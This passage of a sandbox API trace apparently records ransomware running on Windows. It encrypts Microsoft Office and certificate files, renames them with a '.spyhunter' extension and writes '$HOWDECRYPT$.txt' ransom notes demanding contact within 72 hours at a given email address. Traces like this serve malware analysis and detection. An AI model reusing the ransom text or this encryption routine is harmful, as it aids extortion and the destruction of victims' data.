dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbb0*=0x30) returned 1 [0105.633] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0105.694] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE") returned 56 [0105.694] StrStrW (lpFirst="GRAPH.EXE", lpSrch=".txt") returned 0x0 [0105.694] GetProcessHeap () returned 0x2c0000 [0105.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0105.694] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb74, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb74*=0x2800, lpOverlapped=0x0) returned 1 [0105.714] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.714] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fb74, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb74*=0x2800, lpOverlapped=0x0) returned 1 [0105.715] GetProcessHeap () returned 0x2c0000 [0105.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0105.715] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.715] WriteFile (in: hFile=0x16c, lpBuffer=0x248fbb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb74, lpOverlapped=0x0 | out: lpBuffer=0x248fbb4*, lpNumberOfBytesWritten=0x248fb74*=0x4, lpOverlapped=0x0) returned 1 [0105.732] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb74, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb74*=0x30, lpOverlapped=0x0) returned 1 [0105.732] CloseHandle (hObject=0x16c) returned 1 [0105.875] GetProcessHeap () returned 0x2c0000 [0105.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0105.875] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE.spyhunter") returned 66 [0105.875] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe.spyhunter")) returned 1 [0105.876] GetProcessHeap () returned 0x2c0000 [0105.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0105.876] GetProcessHeap () returned 0x2c0000 [0105.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0105.876] GetProcessHeap () returned 0x2c0000 [0105.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x331dc0 | out: hHeap=0x2c0000) returned 1 [0105.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0105.877] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0105.877] WriteFile (in: hFile=0xb4, lpBuffer=0x248fae7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fc10, lpOverlapped=0x0 | out: lpBuffer=0x248fae7*, lpNumberOfBytesWritten=0x248fc10*=0x127, lpOverlapped=0x0) returned 1 [0105.877] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0105.878] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fc10, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fc10*=0x2ac, lpOverlapped=0x0) returned 1 [0105.878] CloseHandle (hObject=0xb4) returned 1 [0105.878] GetProcessHeap () returned 0x2c0000 [0105.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c985d0 | out: hHeap=0x2c0000) returned 1 [0105.878] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0105.878] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0105.878] WriteFile (in: hFile=0xb4, lpBuffer=0x248fae3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fc0c, lpOverlapped=0x0 | out: lpBuffer=0x248fae3*, lpNumberOfBytesWritten=0x248fc0c*=0x127, lpOverlapped=0x0) returned 1 [0105.879] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0105.879] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fc0c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fc0c*=0x2ac, lpOverlapped=0x0) returned 1 [0105.879] CloseHandle (hObject=0xb4) returned 1 [0105.879] GetProcessHeap () returned 0x2c0000 [0105.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b8590 | out: hHeap=0x2c0000) returned 1 [0105.879] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0105.881] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0105.881] WriteFile (in: hFile=0xb4, lpBuffer=0x248fadf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fc08, lpOverlapped=0x0 | out: lpBuffer=0x248fadf*, lpNumberOfBytesWritten=0x248fc08*=0x127, lpOverlapped=0x0) returned 1 [0105.882] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0105.882] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fc08, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fc08*=0x2ac, lpOverlapped=0x0) returned 1 [0105.882] CloseHandle (hObject=0xb4) returned 1 [0105.882] GetProcessHeap () returned 0x2c0000 [0105.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38e8d0 | out: hHeap=0x2c0000) returned 1 [0105.882] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fba8 | out: pbBuffer=0x248fba8) returned 1 [0105.882] GetProcessHeap () returned 0x2c0000 [0105.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0105.882] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fba0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fba0*=0x30) returned 1 [0105.882] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\vs_componentsigningintermediate.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0105.883] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer") returned 122 [0105.883] StrStrW (lpFirst="VS_ComponentSigningIntermediate.cer", lpSrch=".txt") returned 0x0 [0105.883] GetProcessHeap () returned 0x2c0000 [0105.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0105.883] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fb64*=0x38b, lpOverlapped=0x0) returned 1 [0105.885] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffc75, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.885] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x38b, lpNumberOfBytesWritten=0x248fb64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fb64*=0x38b, lpOverlapped=0x0) returned 1 [0105.885] GetProcessHeap () returned 0x2c0000 [0105.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0105.885] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.885] WriteFile (in: hFile=0xb4, lpBuffer=0x248fba4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb64, lpOverlapped=0x0 | out: lpBuffer=0x248fba4*, lpNumberOfBytesWritten=0x248fb64*=0x4, lpOverlapped=0x0) returned 1 [0105.885] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb64, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb64*=0x30, lpOverlapped=0x0) returned 1 [0105.885] CloseHandle (hObject=0xb4) returned 1 [0105.885] GetProcessHeap () returned 0x2c0000 [0105.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0105.885] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer.spyhunter") returned 132 [0105.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\vs_componentsigningintermediate.cer"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\vs_componentsigningintermediate.cer.spyhunter")) returned 1 [0105.886] GetProcessHeap () returned 0x2c0000 [0105.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0105.886] GetProcessHeap () returned 0x2c0000 [0105.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0105.886] GetProcessHeap () returned 0x2c0000 [0105.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38e790 | out: hHeap=0x2c0000) returned 1 [0105.886] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fba0 | out: pbBuffer=0x248fba0) returned 1 [0105.886] GetProcessHeap () returned 0x2c0000 [0105.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0105.886] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fb98*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fb98*=0x30) returned 1 [0105.887] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\verisign_class_3_public_primary_ca.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0105.887] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer") returned 125 [0105.887] StrStrW (lpFirst="VeriSign_Class_3_Public_Primary_CA.cer", lpSrch=".txt") returned 0x0 [0105.887] GetProcessHeap () returned 0x2c0000 [0105.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0105.887] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fb5c*=0x240, lpOverlapped=0x0) returned 1 [0106.035] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffdc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.035] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x248fb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fb5c*=0x240, lpOverlapped=0x0) returned 1 [0106.035] GetProcessHeap () returned 0x2c0000 [0106.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0106.035] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.035] WriteFile (in: hFile=0xb4, lpBuffer=0x248fb9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb5c, lpOverlapped=0x0 | out: lpBuffer=0x248fb9c*, lpNumberOfBytesWritten=0x248fb5c*=0x4, lpOverlapped=0x0) returned 1 [0106.036] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb5c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb5c*=0x30, lpOverlapped=0x0) returned 1 [0106.036] CloseHandle (hObject=0xb4) returned 1 [0106.036] GetProcessHeap () returned 0x2c0000 [0106.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0106.036] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer.spyhunter") returned 135 [0106.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\verisign_class_3_public_primary_ca.cer"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\verisign_class_3_public_primary_ca.cer.spyhunter")) returned 1 [0106.036] GetProcessHeap () returned 0x2c0000 [0106.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0106.036] GetProcessHeap () returned 0x2c0000 [0106.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0106.037] GetProcessHeap () returned 0x2c0000 [0106.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c227d0 | out: hHeap=0x2c0000) returned 1 [0106.037] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fba0 | out: pbBuffer=0x248fba0) returned 1 [0106.037] GetProcessHeap () returned 0x2c0000 [0106.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0106.037] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fb98*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fb98*=0x30) returned 1 [0106.037] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\Management.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\management.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0106.073] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\Management.cer") returned 100 [0106.073] StrStrW (lpFirst="Management.cer", lpSrch=".txt") returned 0x0 [0106.073] GetProcessHeap () returned 0x2c0000 [0106.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0106.073] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fb5c*=0x3b0, lpOverlapped=0x0) returned 1 [0106.084] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffc50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.085] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x248fb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fb5c*=0x3b0, lpOverlapped=0x0) returned 1 [0106.118] GetProcessHeap () returned 0x2c0000 [0106.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0106.118] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.119] WriteFile (in: hFile=0x16c, lpBuffer=0x248fb9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb5c, lpOverlapped=0x0 | out: lpBuffer=0x248fb9c*, lpNumberOfBytesWritten=0x248fb5c*=0x4, lpOverlapped=0x0) returned 1 [0106.119] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb5c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb5c*=0x30, lpOverlapped=0x0) returned 1 [0106.119] CloseHandle (hObject=0x16c) returned 1 [0106.558] GetProcessHeap () returned 0x2c0000 [0106.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cde318 [0106.558] wnsprintfW (in: pszDest=0x2cde318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\Management.cer.spyhunter") returned 110 [0106.559] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\Management.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\management.cer"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\Management.cer.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\management.cer.spyhunter")) returned 1 [0106.559] GetProcessHeap () returned 0x2c0000 [0106.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cde318 | out: hHeap=0x2c0000) returned 1 [0106.559] GetProcessHeap () returned 0x2c0000 [0106.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0106.559] GetProcessHeap () returned 0x2c0000 [0106.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c18f40 | out: hHeap=0x2c0000) returned 1 [0106.560] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0106.611] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0106.611] WriteFile (in: hFile=0x16c, lpBuffer=0x248facf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fbf8, lpOverlapped=0x0 | out: lpBuffer=0x248facf*, lpNumberOfBytesWritten=0x248fbf8*=0x127, lpOverlapped=0x0) returned 1 [0106.612] lstrlenA 